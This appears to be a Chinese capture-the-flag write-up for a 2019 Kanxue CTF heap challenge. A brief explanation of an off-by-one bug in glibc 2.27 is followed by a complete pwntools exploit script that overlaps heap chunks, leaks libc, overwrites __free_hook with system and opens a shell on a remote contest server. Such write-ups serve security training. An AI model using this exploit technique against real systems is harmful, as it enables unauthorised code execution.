【2019看雪CTF】Q2赛季 第二题 沉睡的敦煌 WP
此题本来能edit两次,直接unlink就能get shell。打过去后发现不对,经手工测试发现题目可能改了,询问后果然如此。
题目漏洞点在off-by-one,限制了堆地址上限,申请堆的大小固定为0x28,edit只能一次,默认不能show。主要做法是通过off-by-one使heap overlap,然后就可能unlink、double free等,从而修改bss,突破各种限制,最后更改堆指针,通过edit修改__free_hook为system地址并get shell。
对了,此题Libc为2.27版本,有tcache,一直没做有tcache的题,临时搞了环境,还找队友帮了忙。
最终exp如下:
from pwn import *
context.log_level="debug"
def new(index,note):
p.sendlineafter("4.show\n","1")
p.sendlineafter("index:\n",str(index))
p.sendafter("content:\n",note)
def delete(index):
p.sendlineafter("4.show\n","2")
p.sendlineafter("index:\n",str(index))
def edit(index,note):
p.sendlineafter("4.show\n","3")
p.sendlineafter("index:\n",str(index))
p.sendafter("content:\n",note)
#p=process("./pwn")
p=remote("152.136.18.34",10001)
p.sendlineafter("4.show\n","1")
p.sendlineafter("index:\n","0")
p.recvuntil("gift: ")
heap_addr=int("0x"+p.recvuntil("\n").strip(),16)
p.sendafter("content:\n","AAAA")
for i in range(18):
new(1+i,p64(0)+p64(0x21))
for i in range(8):
delete(7-i)
new(7-i,"A"*0x28+"\xf1")
delete(11)
new(11,p64(0)+p64(0x21)+p64(0x4040c0)+p64(0x4040c8)+p64(0x20)+"\xf1")
for i in range(7):
delete(i+1)
delete(12)
new(20,"AAAA")
new(21,"AAAA")
new(25,"AAAA")
new(26,"AAAA")
new(27,"AAAA")
delete(20)
delete(21)
delete(13)
new(21,p64(heap_addr-0x4052a0+0x405260))
new(22,"AAAA")
new(23,p64(0)+p64(0x31)+p64(0x404048)+p64(0x404050)+p64(0))
delete(27)
delete(14)
delete(25)
new(14,p64(heap_addr-0x4052a0+0x405260+0x20))
new(25,"AAAA")
new(20,p64(0)*2+p64(0x30)+p64(0xf0))
delete(25)
delete(15)
delete(26)
new(30,p64(0x404170))
new(25,"AAAA")
delete(0)
new(31,p64(0x404170)*3+"a"*8)
edit(31,p64(0x404040))
p.sendlineafter("4.show\n","4")
p.sendlineafter("index:\n","30")
libc_addr=u64(p.recv(6)+"\x00\x00")+0x7ffff79e4000-0x7ffff7dd0680
print hex(libc_addr)
edit(31,p64(libc_addr+0x03ed8e8))
edit(30,p64(libc_addr+0x4f440))
edit(25,"/bin/sh\x00")
delete(25)
#gdb.attach(p)
p.interactive()
这次比赛,使用libc2.27服务器上的shell似乎作了改动,直接打印flag然后就退出了。
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
